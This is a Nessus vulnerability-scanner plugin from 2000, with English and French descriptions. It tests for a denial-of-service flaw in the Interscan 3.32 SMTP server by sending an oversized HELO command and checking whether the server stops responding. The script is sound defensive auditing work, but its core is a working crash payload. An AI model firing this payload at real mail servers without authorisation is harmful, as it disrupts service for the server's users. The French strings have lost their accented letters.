#
# This script was written by Alain Thivillon <Alain.Thivillon@hsc.fr>
#
# See the Nessus Scripts License for details
#

if(description)
{
 script_id(10353);
 script_version ("$Revision: 1.6.2.1 $");
 name["english"] = "Interscan 3.32 SMTP Denial";
 name["francais"] = "Dni de service contre le serveur SMTP Interscan 3.32";
 script_name(english:name["english"], francais:name["francais"]);
 
 desc["english"] = "It was possible to perform
a denial of service against the remote
Interscan SMTP server by sending it a special long HELO command. 

This problem allows an attacker to prevent
your Interscan SMTP server from handling requests.

Solution : contact your vendor for a patch.

Risk factor : Serious";

 desc["francais"] = "Il s'est avr possible
de crer un dni de service sur le serveur
SMTP Interscan distant en lui envoyant une commande HELO
longue

Un pirate peut utiliser ce problme
pour empecher votre serveur de traiter
les requetes SMTP.

Solution : contactez votre vendeur pour un
patch.

Facteur de risque : Serieux";


 script_description(english:desc["english"], francais:desc["francais"]);
 
 summary["english"] = "Crashes the Interscan NT SMTP Server";
 summary["francais"] = "Fait planter le serveur SMTP Interscan NT";
 script_summary(english:summary["english"], francais:summary["francais"]);
 
 script_category(ACT_DENIAL);
 
 
 script_copyright(english:"This script is Copyright (C) 2000 Renaud Deraison and Alain Thivillon",
		francais:"Ce script est Copyright (C) 2000 Renaud Deraison et Alain Thivillon");
 family["english"] = "Denial of Service";
 family["francais"] = "Dni de service";
 script_family(english:family["english"], francais:family["francais"]);
 script_dependencie("find_service.nes");
 script_require_ports("Services/smtp", 25);
 exit(0);
}

#
# The script code starts here
#

port = get_kb_item("Services/smtp");
if(!port)port = 25;
if(!get_port_state(port))exit(0);

 soc = open_sock_tcp(port);
 if(soc)
 {
   s = recv_line(socket:soc, length:4096);
   if(s)
   {
   c = string("HELO ", crap(length:4090, data:"."),"\r\n");
   send(socket:soc, data:c);
   s = recv_line(socket:soc, length:5000, timeout:20);
   if(!s) security_hole(port);
   c = string("HELO a\r\n");
   send(socket:soc, data:c);
   s = recv_line(socket:soc, length:2048, timeout:20);
   if(!s) security_hole(port);
   }
   close(soc);
 }
	
